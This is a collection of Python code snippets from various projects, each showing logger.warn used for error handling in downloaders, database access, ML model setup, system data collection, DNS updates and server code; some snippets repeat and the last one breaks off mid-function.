Example #1
def download_img_file(src_url, file_path):
    """
    外部URL下载文件接口
    :param src_url: URL
    :param file_path: 下载文件存放路径
    :return:
            result_code: True 下载文件成功,下载文件失败
            file_path:对应文件可能存在,可能不存在,result_code为True的时候一定存在
    """

    if src_url is None:
        raise ValueError("download url file url param or url_md5 param is None")

    url_res = urlparse.urlparse(src_url)
    if url_res is None:
        raise ValueError("parse %s url is error, please check this url" % src_url)

    url_scheme = url_res.scheme
    if url_scheme != "http" and url_scheme != "https":
        raise ValueError("only support http or https scheme url:%s" % src_url)

    try:
        result_code, download_label = __do_download_file(src_url, file_path)
    except Exception as e:
        logger.warn("do download %s url file error: %s" % (src_url, str(e)))
        download_label = "request_url_failure"
        result_code = False

    if not result_code:
        logger.warn("do download %s url file error: %s" % (src_url, download_label))
    return result_code
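The private helper __do_download_file is referenced above but not shown. Below is a minimal sketch of what it might look like, assuming the requests library and assuming the second return value is a short failure label; this is an illustration, not the original implementation.

import requests

def __do_download_file(src_url, file_path, timeout=30):
    # Hypothetical helper: stream src_url to file_path and return
    # (result_code, download_label); the label only matters on failure.
    resp = requests.get(src_url, stream=True, timeout=timeout)
    if resp.status_code != 200:
        return False, "http_status_%d" % resp.status_code
    with open(file_path, "wb") as fp:
        for chunk in resp.iter_content(chunk_size=8192):
            if chunk:
                fp.write(chunk)
    return True, "ok"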
Example #2
    def __init__(self,
                 imgh=32,
                 imgw=100,
                 input_channel=1,
                 output_channel=512,
                 hidden_size=256,
                 num_fiducial=20,
                 num_class=41,
                 bilstm=True,
                 device=torch.device('cuda:0')):
        super(Model, self).__init__()

        logger.info(
            f'bi-lstm: {bilstm} | device: {device} | num_class: {num_class}')
        self.num_class = num_class
        self.bilstm = bilstm

        self.transformation = TPS_STN(num_fiducial,
                                      I_size=(imgh, imgw),
                                      I_r_size=(imgh, imgw),
                                      device=device,
                                      I_channel_num=input_channel)
        self.fe = ResNet50(input_channel, output_channel)

        self.adaptive_avg_pool = nn.AdaptiveAvgPool2d((None, 1))
        if self.bilstm:
            self.seq = nn.Sequential(
                BiLSTM(output_channel, hidden_size, hidden_size),
                BiLSTM(hidden_size, hidden_size, hidden_size))
            self.seq_out_channels = hidden_size
        else:
            logger.warn('There is no sequence model specified')
            self.seq_out_channels = output_channel
        self.prediction = Transformer(self.num_class, self.seq_out_channels)
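A hypothetical instantiation of this model, assuming the TPS_STN, ResNet50, BiLSTM and Transformer modules referenced above are importable from the same project:

import torch

device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
model = Model(imgh=32, imgw=100, num_class=41, bilstm=True, device=device)
# Input crops are grayscale (N, C, H, W) tensors matching imgh/imgw.
batch = torch.zeros(8, 1, 32, 100, device=device)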
Example #3
def parseDateStr(dateStr):
    ret = None
    if dateStr != "":
        fmts = [
            "%B %d, %Y",  #vice, infowars, mic, spin
            "%m/%d/%y %H:%M%p", #kotaku, lifehacker, deadspin, gawker
            "%b %d, %Y %H:%M%p", #elitedaily
            "%Y-%m-%d", #eonline, etonline
            "%Y%m%d%H", #hollywoodreporter
            "%B %d, %Y | %H:%M%p", #pagesix
            "%d %b %Y at %H:%M", #rawstory
            "%m.%d.%y %H:%M %p", #thedailybeast
            "%b %d, %Y %H:%M %p", #townhall
            "%B %d, %Y @ %H:%M %p", #usmagazine
        ]

        for fmt in fmts:
            try:
                ret = datetime.strptime(dateStr, fmt)
                break
            except ValueError as e:
                logger.warn(u"parse `%s` error: %s", dateStr, e)
        if ret is None:
            # as a last resort, fall back to dateutil
            try:
                ret = parseDateString(dateStr, fuzzy=True)
            except Exception as e:
                logger.warn(u"parse `%s` error: %s", dateStr, e)
    return ret
Example #4
def insert_questionnair_records(records):
    """
    Insert the questionnaire records that were read into the database

    Parameters
    -----------
    records : list
        list of QuestionnaireRecord
    """
    conn = connect_database()
    with conn.cursor() as cur:
        for record in records:
            sql = ('insert into xy_wenjuan '
                   '(barcode, lbcode, lbname, qcode, question, answer) '
                   'VALUES (%s, %s, %s, %s, %s, %s)')
            params = (
                record.tjid,
                record.lbbm,
                record.lbmc,
                record.qcode,
                record.question,
                record.answer,
            )
            try:
                logger.debug(sql)
                # Let the driver quote the values instead of interpolating
                # them into the SQL string, which invites SQL injection.
                cur.execute(sql, params)
            except Exception:
                logger.warn(
                    'Insertion failed when trying to insert %s!' % record.line
                )
        conn.commit()
Example #5
    def __init__(self, exchange, symbol, bid, ask, action):
        # Set the attributes of the order.
        self.exchange = exchange
        self.symbol = symbol
        self.bid = bid
        self.ask = ask
        self.action = action

        # Process the action.
        ## It should come in the format [place_order, order_type, side, amount_proportion, price_percentage].
        self.place_order, self.order_type, self.side, amount_proportion, price_percentage = action

        ## Determine the price for the order using the bid-ask spread and the price percentage.
        if self.side == 'buy':
            self.price = ask * (1 + price_percentage)
        elif self.side == 'sell':
            self.price = bid * (1 + price_percentage)
        else:
            raise ValueError("unknown side: %r" % self.side)

        ## Determine the amount for the order using the available balance and the proportion.
        try:
            self.amount = amount_proportion * (exchange.fetch_balance()['BTC']['free'] / self.price)
        except TypeError as amount_calc_error:
            logger.warn("Error calculating order amount: " + amount_calc_error.message)
            self.amount = 0.0

        # Initialize the order ID to None.
        self.id = None
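A hypothetical construction, assuming the enclosing class is named Order and that exchange is a ccxt-style client whose fetch_balance() returns a dict with ['BTC']['free']:

# action = [place_order, order_type, side, amount_proportion, price_percentage]
action = [True, 'limit', 'buy', 0.5, -0.001]   # bid 0.1% below the ask
order = Order(exchange, 'BTC/USD', bid=9990.0, ask=10000.0, action=action)
# order.price == 10000.0 * (1 - 0.001) == 9990.0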
Example #6
    def save(self):
        """Dump all data we can collect to tmp directory"""
        data_dir_timestamp = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
        data_dir_prefix = 'satellite-sanity-save-%s' % data_dir_timestamp
        data_dir_base = tempfile.mkdtemp(suffix='', prefix='%s-' % data_dir_prefix, dir=D_TMP)
        data_dir = os.path.join(data_dir_base, 'satellite-sanity')
        os.makedirs(data_dir)
        logger.debug("Saving to directory %s" % data_dir)
        for key in self.config['commands'].keys():
            data_file = os.path.join(data_dir, key)
            fd = open(data_file, 'w')
            try:
                for row in self[key]:
                    fd.write("%s\n" % row)
            except DataNotAvailable:
                logger.warn("Failed when obtaining %s" % key)
            fd.close()
            if self[key] is not None:
                data_file_lines = len(self[key])
            else:
                data_file_lines = -1
            logger.debug("Saved %s lines to %s" % (data_file_lines, data_file))
        data_tarxz = "%s.tar.xz" % data_dir_base
        command = ['tar', '-cJf', data_tarxz, '-C', data_dir_base, 'satellite-sanity']
        logger.debug("Running %s" % command)
        process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        assert len(stderr) == 0, "Compress failed with '%s' when running '%s'" % (stderr, command)
        logger.info("Saved to %s" % data_tarxz)
        return data_tarxz
Example #7
def scan_for_installers(dot_install_dir):
    installers = {}

    # Scan for every json file in 'installers'
    for installer in os.listdir(os.path.join(BASE_DIR, "installers")):
        if installer.endswith(".json"):
            with open(os.path.join(BASE_DIR, "installers", installer),
                      "rt") as installer_fp:
                # Replace the {DOT_INSTALL_DIR}
                file_contents = installer_fp.read()
                file_contents = file_contents.replace("{DOT_INSTALL_DIR}",
                                                      dot_install_dir)

                try:
                    # Add the install data to installers.
                    data = json.loads(file_contents)
                    name = installer[:-5]
                    if "module_name" in data.keys():
                        name = data["module_name"]

                    installers[name] = data
                except json.JSONDecodeError:  # It was not a valid json file.
                    logger.warn(
                        "{} is not a valid installer!".format(installer))

    return installers
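A usage sketch; BASE_DIR and the installers/ layout come from the code above, while the install directory argument is illustrative:

# Every installers/*.json under BASE_DIR is scanned; a "module_name" key,
# when present, overrides the name derived from the file name.
installers = scan_for_installers("/home/user/.dotfiles")
for name, data in installers.items():
    print(name, data)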
Example #8
def get_questionnaire_result_from_database(tjid):
    """
    Fetch the questionnaire records for the given examinee from the database

    Parameters
    -----------
    tjid : str
        specimen barcode

    Returns
    --------
    records : list
        list of QuestionnaireRecord object
    """
    records = []
    conn = connect_database()
    with conn.cursor() as cur:
        sql = ('select lbcode, lbname, qcode, question, answer '
               'from xy_wenjuan where barcode=%s')
        cur.execute(sql, (tjid,))
        all_res = cur.fetchall()
    if not all_res:
        logger.warn('No questionnaire records found for specimen %s!' % tjid)
        return []
    for res in all_res:
        ques_record = QuestionnaireRecord()
        ques_record.tjid = tjid
        ques_record.lbbm = res[0]
        ques_record.lbmc = ensure_unicode(res[1])
        ques_record.qcode = res[2]
        ques_record.question = ensure_unicode(res[3])
        ques_record.answer = ensure_unicode(res[4])
        records.append(ques_record)
    return records
Example #9
async def fetch_data(url, data, headers):
    '''Helper for fetching data from a URL'''
    async with aiohttp.ClientSession() as session:
        async with session.post(url, data=data, headers=headers) as resp:
            if resp.status == 200:
                return await resp.text()
            logger.warn('Fetch data status failed. URL: {}, args: {}, '
                        'status: {}'.format(url, data, resp.status))
    return None
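A usage sketch, assuming Python 3.7+ for asyncio.run; the URL and payload are illustrative:

import asyncio

async def main():
    body = await fetch_data('https://example.com/api',
                            data={'q': 'test'},
                            headers={'Accept': 'text/html'})
    print(body if body is not None else 'request failed')

asyncio.run(main())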
Example #10
    def __init__(self,
                 num_topics,
                 vocab_size,
                 t_hidden_size,
                 rho_size,
                 theta_act,
                 embeddings=None,
                 train_embeddings=True,
                 enc_drop=0.25):
        super(ETM, self).__init__()

        ## define hyperparameters
        self.num_topics = num_topics
        self.vocab_size = vocab_size
        self.t_hidden_size = t_hidden_size
        self.rho_size = rho_size
        self.enc_drop = enc_drop
        self.t_drop = nn.Dropout(enc_drop)

        self.theta_act = self.get_activation(theta_act)

        ## define the word embedding matrix \rho
        if embeddings is None:
            self.rho = nn.Linear(rho_size, vocab_size, bias=False)
        else:
            num_embeddings, embedding_dim = embeddings.size()
            if not embedding_dim == rho_size:
                logger.warn(
                    f"rho size overridden by Embedding size {embedding_dim}")
                rho_size = embedding_dim
                self.rho_size = embedding_dim
            emb_layer = nn.Embedding(num_embeddings, embedding_dim)
            emb_layer.load_state_dict({'weight': embeddings})
            if not train_embeddings:
                emb_layer.weight.requires_grad = False
            self.rho = emb_layer

        ## define the matrix containing the topic embeddings
        self.alphas = nn.Linear(
            rho_size, num_topics,
            bias=False)  #nn.Parameter(torch.randn(rho_size, num_topics))

        ## define variational distribution for \theta_{1:D} via amortization
        self.q_theta = nn.Sequential(
            nn.Linear(vocab_size, t_hidden_size),
            self.theta_act,
            nn.Linear(t_hidden_size, t_hidden_size),
            self.theta_act,
        )
        self.mu_q_theta = nn.Linear(t_hidden_size, num_topics, bias=True)
        self.logsigma_q_theta = nn.Linear(t_hidden_size, num_topics, bias=True)

        params = list(self.parameters())
        for param in params:
            self.weights_init(param)
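A hypothetical instantiation with randomly initialized word embeddings; the 'relu' argument assumes get_activation (not shown here) accepts the usual activation names:

model = ETM(num_topics=50, vocab_size=5000, t_hidden_size=800,
            rho_size=300, theta_act='relu', enc_drop=0.25)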
Example #11
    def test_list(self):
        command = ["list"]

        channel = 'bottystuff'

        user = User(username="******")

        b = commands.PepsiCommand(command, channel, user)

        for p in Purchase.select():
            logger.warn(p.buyer)
            logger.warn(p.drink_type)
Example #12
def createTables():

    msg = None
    stat = None
    try:
        logger.warn("CREATING TABLES")
        db.create_all()
        msg = "Non existent tables created!"
        stat = Result.SUCCESS
    except Exception as ex:
        msg = str(ex)
        stat = Result.FAILURE

    return Result(data=msg, status=stat).toJSON()
Example #13
    def power_on_host(free_memory, cpus, delay=5, timeout=None):
        """
		Try to power on a node connecting with CLUES
		
		Args:
		- free_memory: amount of memory needed in the host.
		- cpus: number of cpus needed in the host.
		- delay: number of seconds to sleep when waiting the request to be served (default 5).
		- timeout: timeout (in secs) to wait the request to be served (default configcli.config_client.CLUES_REQUEST_WAIT_TIMEOUT).

		Return: True if a host has been powered on or False otherwise. 
		"""
        try:
            import configcli
            if not timeout:
                timeout = configcli.config_client.CLUES_REQUEST_WAIT_TIMEOUT
            clues_server = configcli.get_clues_proxy_from_config()
            success, r_id = clues_server.request_create(
                configcli.config_client.CLUES_SECRET_TOKEN, cpus, free_memory,
                1, "")

            if not success:
                logger.error("Error creating a CLUES request: %s" % r_id)
                return False

            now = time.time()

            served = False
            while not served:
                success, served = clues_server.request_wait(
                    configcli.config_client.CLUES_SECRET_TOKEN, r_id, 1)

                if success and served:
                    return True
                elif ((time.time() - now) > timeout):
                    return False
                else:
                    time.sleep(delay)

            return served
        except ImportError:
            logger.warn(
                "Error trying to import configcli. It seems that CLUES client library is not installed."
            )
            return False
        except Exception as ex:
            logger.warn("Error trying to power on a node with CLUES: %s" %
                        str(ex))
            return False
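A hypothetical call, assuming the method is exposed as a static helper; the units of free_memory are whatever CLUES expects, since the code forwards the number unchanged:

# Ask CLUES for a node with 2 CPUs, polling every 10 s for up to 5 minutes.
powered = power_on_host(free_memory=4194304, cpus=2, delay=10, timeout=300)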
Example #14
def symlink(src, dst, is_directory=False):
    install_folder = "/".join(dst.split("/")[:-1])
    os.makedirs(install_folder, 0o755, exist_ok=True)

    # Remove file if it already exists
    if os.path.lexists(dst):
        logger.warn("{} exists. Deleting...".format(dst))

        if not os.path.isdir(dst) or os.path.islink(dst):
            os.remove(dst)
        else:
            shutil.rmtree(dst)

    logger.debug("Symlinking {} to {}.".format(src, dst))
    os.symlink(src, dst, target_is_directory=is_directory)
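Hypothetical usage, linking dotfiles from a repository into place (all paths are illustrative):

symlink("/home/user/dotfiles/vimrc", "/home/user/.vimrc")
symlink("/home/user/dotfiles/nvim", "/home/user/.config/nvim",
        is_directory=True)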
Example #15
    def init(self):
        addr = (self.ip, opt.udp_port)
        while True:
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                sock.setblocking(0)
                sock.bind(addr)
                break
            except socket.error as e:
                logger.warn(e)
                logger.warn('restarting UDPServer')
                time.sleep(1)
        logger.info('UDP Server started on %s:%s' % addr)
        self.sock = sock
Example #16
    def set_default_stats(cls):
        try:
            file_excution = FileExcution(NAMED_PATH_FILE)
            if file_excution.contents is None:
                logger.warn("named.conf does not exist")
                return

            # logger.debug("{}".format(str(file_excution.content)))
            stats_default = dict({"stats_map": dict()})
            views_default = set_view_default_named(file_excution)
            clients_default = set_clients_default_named(file_excution)
            servers_default = set_servers_default_named(file_excution)
        except Exception as ex:
            logger.error("AgentServer init error: {}".format(ex))
            logger.error(traceback.format_exc())
Example #17
def get_physical_examination_from_database(tjid, product):
    """
    Fetch the physical examination records for the given barcode from the database

    Parameters
    -----------
    tjid : str
        specimen barcode
    product : str
        product name, like healthwise or cardiowise.

    Returns
    --------
    records : list
        list of PhysicalExaminationRecord object
    """
    records = []
    conn = connect_database()
    with conn.cursor() as cur:
        sql = ('select itemcode, itemname, result, unit, defvalue, '
               'class0, ksbm, orderitem '
               'from xy_tijian where barcode=%s')
        cur.execute(sql, (tjid,))
        all_res = cur.fetchall()
    if not all_res:
        logger.warn('No physical examination records found for specimen %s!' % tjid)
        return []
    for res in all_res:
        pe_record = PhysicalExaminationRecord()
        pe_record.tjid = tjid
        pe_record.item_code = res[0]
        pe_record.item_name = res[1]
        pe_record.check_result = res[2]
        pe_record.unit = res[3] if res[3] is not None else ''
        pe_record.def_value = ensure_unicode(convert_text2tex(res[4])) \
            if res[4] is not None else ''
        pe_record.class0 = ensure_unicode(res[5]) if res[5] is not None else ''
        pe_record.ksbm = res[6]
        pe_record.sfxmmc = ensure_unicode(res[7]) if res[7] is not None else ''
        # todo, Hard code, should be modified in future.
        if product == 'healthwise' and pe_record.class0 != u'基本指标':
            continue
        if product == 'cardiowise' and pe_record.class0 \
                not in [u'基本指标', u'心血管病风险筛查']:
            continue
        records.append(pe_record)
    return records
Example #18
    def resolve_address_google(self, address, **kwargs):
        try:
            encoded_address = encode(address)
            address = urllib.quote(encoded_address)

            url = "https://maps.googleapis.com/maps/api/geocode/json?address=%s&sensor=false&region=za&key=%s" % (address, configuration["environment"]["google_key"])
            response = urllib2.urlopen(url)
            js = response.read()
            try:
                js = json.loads(js)
            except ValueError:
                logger.exception("Error trying to resolve %s" % address)
                return None

            results = []
            if "status" in js and js["status"] != "OK": 
                logger.warn("Error trying to resolve %s - %s" % (address, js.get("error_message", "Generic Error")))
                return None

            if "results" in js and len(js["results"]) > 0:
                for result in js["results"]:

                    res = self.reject_partial_match(result)
                    if res: continue

                    if "reject_resolution_to_main_place" in kwargs:
                        try:
                            res = self.reject_resolution_to_main_place(result["formatted_address"], int(kwargs["reject_resolution_to_main_place"][0]))
                        except (ValueError, TypeError):
                            res = self.resolution_to_main_place(result["formatted_address"])
                        if res: continue

                    geom = result["geometry"]["location"]
                    results.append({
                        "lat" : geom["lat"],
                        "lng" : geom["lng"],   
                        "formatted_address" : result["formatted_address"],
                        "source" : "Google Geocoding API",
                    })

                if len(results) == 0: return None
                return results
        except Exception:
            logger.exception("Error trying to resolve %s" % address)
        return None
Example #19
def get_gene_test_result_from_database(tjid, test_product, phenotypes=None):
    """
    Fetch the gene test results for the given barcode and test product from the database

    Parameters
    ------------
    tjid : str
        specimen barcode
    test_product : str
        product name, like healthwise.
    phenotypes : list
        list of phenotype names

    Returns
    --------
    records : list
        list of GeneTestRecord object
    """
    records = []
    conn = connect_database()
    with conn.cursor() as cur:
        sql = ('select barcode, test_item, gene, result, category '
               'from gene_results '
               'where barcode=%s and lower(test_product)=%s')
        cur.execute(sql, (tjid, test_product))
        all_res = cur.fetchall()
    conn.close()
    if not all_res:
        logger.warn('No gene test results found for specimen %s!' % tjid)
        return []
    for res in all_res:
        gene_test_record = GeneTestRecord()
        gene_test_record.barcode = res[0]
        gene_test_record.test_item = ensure_unicode(res[1])
        gene_test_record.gene = res[2]
        gene_test_record.risk_level = ensure_unicode(res[3])
        gene_test_record.category = ensure_unicode(res[4])
        if phenotypes is None or gene_test_record.test_item in phenotypes:
            records.append(gene_test_record)
    return records
Example #20
    def save(self):
        """Dump all data we can collect to tmp directory"""
        data_dir_timestamp = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
        data_dir_prefix = 'satellite-sanity-save-%s' % data_dir_timestamp
        data_dir = tempfile.mkdtemp(suffix='', prefix=data_dir_prefix)
        logger.debug("Saving to directory %s" % data_dir)
        for key in self.config['commands'].keys():
            data_file = os.path.join(data_dir, key)
            fd = open(data_file, 'w')
            try:
                for row in self[key]:
                    fd.write("%s\n" % row)
            except AssertionError:
                logger.warn("Failed when obtaining %s" % key)
            fd.close()
            data_file_lines = len(self[key]) if self[key] is not None else -1
            logger.debug("Saved %s lines to %s" % (data_file_lines, data_file))
        return data_dir
Example #21
	def migrate_vm(self, vm_id, host_info, all_vms):
		"""
		Migrate one of the VMs of the host to free memory
		"""
		logger.debug("Migrating.")
		
		vm_to_migrate = self.select_vm_to_migrate(vm_id, host_info, all_vms)
		host_to_migrate = self.select_host_to_migrate(vm_to_migrate)
		if not host_to_migrate:
			logger.warn("There are no host with enough resources to host the VM " + str(vm_to_migrate.id))
			return False
	
		if not Config.ONLY_TEST:
			logger.debug("Migrate the VM %d to host %d" % (vm_to_migrate.id, host_to_migrate.id))
			return self.cmp.migrate(vm_to_migrate.id, host_to_migrate.id)
		else:
			logger.debug("No migrate. This is just a test.")
			return False
Example #22
File: net.py  Project: docblades/PynDns
    def validate_response(self, response):
        codes = self.parse_response(response)
        logger.debug("Codes: %s", codes)
        
        error_codes = ['badauth', '!donator', 'notfqdn',
                       'nohost', 'numhost', 'abuse',
                       'badagent', 'good 127.0.0.1']
        warn_codes = ['dnserr', '911', 'nochg']
        
        for code in codes:
            if code in error_codes:
                logger.error("Response from DynDns: '{0}'".format(code))
                raise DynDnsResponseException(code, self.get_message_from_code(code))
            elif code in warn_codes:
                logger.warn("Response from DynDns: '{0}'".format(code))
                return False

        return True
Example #23
    def save(self):
        """Dump all data we can collect to tmp directory"""
        data_dir_timestamp = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
        data_dir_prefix = 'satellite-sanity-save-%s' % data_dir_timestamp
        data_dir = tempfile.mkdtemp(suffix='', prefix=data_dir_prefix)
        logger.debug("Saving to directory %s" % data_dir)
        for key in self.config['commands'].keys():
            data_file = os.path.join(data_dir, key)
            fd = open(data_file, 'w')
            try:
                for row in self[key]:
                    fd.write("%s\n" % row)
            except AssertionError:
                logger.warn("Failed when obtaining %s" % key)
            fd.close()
            data_file_lines = len(self[key]) if self[key] is not None else -1
            logger.debug("Saved %s lines to %s" % (data_file_lines, data_file))
        return data_dir
Example #24
	def power_on_host(free_memory, cpus, delay = 5, timeout = None):
		"""
		Try to power on a node connecting with CLUES
		
		Args:
		- free_memory: amount of memory needed in the host.
		- cpus: number of cpus needed in the host.
		- delay: number of seconds to sleep while waiting for the request to be served (default 5).
		- timeout: timeout (in secs) to wait for the request to be served (default configcli.config_client.CLUES_REQUEST_WAIT_TIMEOUT).

		Return: True if a host has been powered on or False otherwise. 
		"""
		try:
			import configcli
			if not timeout:
				timeout = configcli.config_client.CLUES_REQUEST_WAIT_TIMEOUT
			clues_server = configcli.get_clues_proxy_from_config()
			success, r_id = clues_server.request_create(configcli.config_client.CLUES_SECRET_TOKEN, cpus, free_memory, 1, "")
			
			if not success:
				logger.error("Error creating a CLUES request: %s" % r_id)
				return False
			
			now = time.time()
			
			served = False
			while not served:
				success, served = clues_server.request_wait(configcli.config_client.CLUES_SECRET_TOKEN, r_id, 1)
				
				if success and served:
					return True
				elif ((time.time() - now) > timeout):
					return False
				else:
					time.sleep(delay)
			
			return served
		except ImportError:
			logger.warn("Error trying to import configcli. It seems that CLUES client library is not installed.")
			return False
		except Exception as ex:
			logger.warn("Error trying to power on a node with CLUES: %s" % str(ex))
			return False
Example #25
File: net.py  Project: docblades/PynDns
    def validate_response(self, response):
        codes = self.parse_response(response)
        logger.debug("Codes: %s", codes)

        error_codes = [
            'badauth', '!donator', 'notfqdn', 'nohost', 'numhost', 'abuse',
            'badagent', 'good 127.0.0.1'
        ]
        warn_codes = ['dnserr', '911', 'nochg']

        for code in codes:
            if code in error_codes:
                logger.error("Response from DynDns: '{0}'".format(code))
                raise DynDnsResponseException(code,
                                              self.get_message_from_code(code))
            elif code in warn_codes:
                logger.warn("Response from DynDns: '{0}'".format(code))
                return False

        return True
Example #26
    def migrate_vm(self, vm_id, host_info, all_vms):
        """
		Migrate one of the VMs of the host to free memory
		"""
        logger.debug("Migrating.")

        vm_to_migrate = self.select_vm_to_migrate(vm_id, host_info, all_vms)
        host_to_migrate = self.select_host_to_migrate(vm_to_migrate)
        if not host_to_migrate:
            logger.warn(
                "There is no host with enough resources to host the VM " +
                str(vm_to_migrate.id))
            return False

        if not Config.ONLY_TEST:
            logger.debug("Migrate the VM %d to host %d" %
                         (vm_to_migrate.id, host_to_migrate.id))
            return self.cmp.migrate(vm_to_migrate.id, host_to_migrate.id)
        else:
            logger.debug("No migrate. This is just a test.")
            return False
Example #27
def build_config(args):
    config = data.Config()

    if args.config:
        logger.debug('Loading file from --config')
        fp = args.config
    else:  #pragma: no cover
        logger.debug('Looking for a config file')
        fp = find_config_file()

    if fp:
        logger.debug('Found a config file. Loading.')
        try:
            config.from_file(fp)
        except data.InvalidConfiguration as ex:
            logger.warn(str(ex))

    logger.debug('Overwriting config params with command line args.')
    config.from_args(args)
    logger.debug('Running validation against config')
    config.validate()
    return config
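A hypothetical driver, assuming the surrounding argparse setup exposes a --config file argument and whatever attributes config.from_args expects (all names are illustrative):

import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--config', type=argparse.FileType('r'), default=None)
args = parser.parse_args()
config = build_config(args)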
Example #28
    def save(self):
        """Dump all data we can collect to tmp directory"""
        data_dir_timestamp = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
        data_dir_prefix = 'satellite-sanity-save-%s' % data_dir_timestamp
        data_dir_base = tempfile.mkdtemp(suffix='', prefix='%s-' % data_dir_prefix, dir=D_TMP)
        data_dir = os.path.join(data_dir_base, 'satellite-sanity')
        os.makedirs(data_dir)
        logger.debug("Saving to directory %s" % data_dir)
        for key in self.config['commands'].keys():
            data_file = os.path.join(data_dir, key)
            fd = open(data_file, 'w')
            try:
                for row in self[key]:
                    fd.write("%s\n" % row)
            except DataNotAvailable:
                logger.warn("Failed when obtaining %s" % key)
            fd.close()
            if self[key] is not None:
                data_file_lines = len(self[key])
            else:
                data_file_lines = -1
            logger.debug("Saved %s lines to %s" % (data_file_lines, data_file))
        data_tarxz = "%s.tar.xz" % data_dir_base
        command = ['tar', '-cJf', data_tarxz, '-C', data_dir_base, 'satellite-sanity']
        logger.debug("Running %s" % command)
        process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        assert len(stderr) == 0, "Compress failed with '%s' when running '%s'" % (stderr, command)
        logger.info("Saved to %s" % data_tarxz)
        return data_tarxz
Example #29
def build_config(args):
    config = data.Config()

    if args.config:
        logger.debug('Loading file from --config')
        fp = args.config
    else: #pragma: no cover
        logger.debug('Looking for a config file')
        fp = find_config_file()

    if fp:
        logger.debug('Found a config file. Loading.')
        try:
            config.from_file(fp)
        except data.InvalidConfiguration as ex:
            logger.warn(str(ex))

    logger.debug('Overwriting config params with command line args.')
    config.from_args(args)
    logger.debug('Running validation against config')
    config.validate()
    return config
Example #30
def insert_physical_examination_records(records):
    """
    Insert the physical examination records that were read into the database

    Parameters
    -----------
    records : list
        list of PhysicalExaminationRecord
    """
    conn = connect_database()
    with conn.cursor() as cur:
        for record in records:
            sql = ('insert into xy_tijian '
                   '(barcode, class0, ksbm, orderitem, itemcode, itemname, '
                   'result, unit, defvalue) '
                   'VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)')
            params = (
                record.tjid,
                record.class0,
                record.ksbm,
                record.sfxmmc,
                record.item_code,
                record.item_name,
                record.check_result,
                record.unit,
                record.def_value,
            )
            try:
                logger.debug(sql)
                # Let the driver quote the values instead of interpolating
                # them into the SQL string, which invites SQL injection.
                cur.execute(sql, params)
            except Exception:
                logger.warn(
                    'Insertion failed when trying to insert %s!' % record.line
                )
        conn.commit()
Example #31
 def __load(self, label):
     """Get output of coresponding command or if __data_dir is set load
    content of coresponding file and store it to self.__data[label].
    If command fails, usually "['']" is stored."""
     assert label not in self.__data
     # Are we running on live system or from directory?
     if not self.__data_dir:
         if label not in self.__access_list:
             self.__access_list[label] = self.config['commands'][label]
         # TODO: Add some timeouts, ulimit, nice... (?)
         logger.debug("Going to execute '%s' for '%s'" %
                      (self.config['commands'][label], label))
         # FIXME: is it OK to have shell=True here from a security standpoint?
         process = subprocess.Popen([self.config['commands'][label]],
                                    shell=True,
                                    stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE)
         # FIXME: is this the correct way to run this? Can't we get stuck when the data are too big?
         stdout, stderr = process.communicate()
         if len(stderr) != 0:
             logger.warn("Command '%s' failed with '%s'" %
                         (self.config['commands'][label], stderr))
             self.__data[label] = None
             raise DataNotAvailable(
                 "Command '%s' failed with '%s'" %
                 (self.config['commands'][label], stderr))
         self.__data[label] = stdout.strip().split("\n")
     else:
         our_file = None
         our_file_rel = None
         for relative_file in self.config['files'][label]:
             f = os.path.join(self.__data_dir, relative_file)
             if os.path.isfile(f):
                 our_file = f
                 our_file_rel = relative_file
                 break
         if our_file:
             logger.debug("Going to load '%s' for '%s'" % (f, label))
             if label not in self.__access_list:
                 self.__access_list[label] = our_file_rel
             try:
                 fp = open(f, 'r')
             except IOError:
                 logger.warn("Failed to load %s for %s" % (f, label))
                 self.__data[label] = None
                 raise DataNotAvailable("Failed to load %s for %s" %
                                        (f, label))
             self.__data[label] = fp.read().splitlines()
             fp.close()
         else:
             logger.warn("Suitable file for %s not found" % label)
             self.__data[label] = None
             raise DataNotAvailable("Suitable file for %s not found" %
                                    label)
Example #32
def stop():
    try:
        pid1 = int(open('/tmp/udp.pid').read())
        pid2 = int(open('/tmp/tcp.pid').read())
    except IOError:
        logger.warn('can not find any running server')
    else:
        try:
            os.kill(pid1, signal.SIGKILL)
            os.kill(pid2, signal.SIGKILL)
        except Exception as e:
            logger.warn('error when killing %s: %s' % (pid1, e))
            logger.warn('error when killing %s: %s' % (pid2, e))
        else:
            logger.info('Process udp and tcp killed')
            try:
                os.remove('/tmp/udp.pid')
                os.remove('/tmp/tcp.pid')
                sys.exit(0)
            except OSError as e:
                logger.warn('remove pid file failed: %s' % e)
Example #33
 def __load(self, label):
   """Get output of coresponding command or if __data_dir is set load
      content of coresponding file and store it to self.__data[label].
      If command fails, usually "['']" is stored."""
   assert label not in self.__data
   # Are we running on live system or from directory?
   if not self.__data_dir:
     if label not in self.__access_list:
       self.__access_list[label] = self.config['commands'][label]
     # TODO: Add some timeouts, ulimit, nice... (?)
     logger.debug("Going to execute '%s' for '%s'" % (self.config['commands'][label], label))
      # FIXME: is it OK to have shell=True here from a security standpoint?
     process = subprocess.Popen([self.config['commands'][label]], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
      # FIXME: is this the correct way to run this? Can't we get stuck when the data are too big?
     stdout, stderr = process.communicate()
     if len(stderr) != 0:
       logger.warn("Command '%s' failed with '%s'" % (self.config['commands'][label], stderr))
       self.__data[label] = None
       raise DataNotAvailable("Command '%s' failed with '%s'" % (self.config['commands'][label], stderr))
     self.__data[label] = stdout.strip().split("\n")
   else:
     our_file = None
     our_file_rel = None
     for relative_file in self.config['files'][label]:
       f = os.path.join(self.__data_dir, relative_file)
       if os.path.isfile(f):
         our_file = f
         our_file_rel = relative_file
         break
     if our_file:
       logger.debug("Going to load '%s' for '%s'" % (f, label))
       if label not in self.__access_list:
         self.__access_list[label] = our_file_rel
       try:
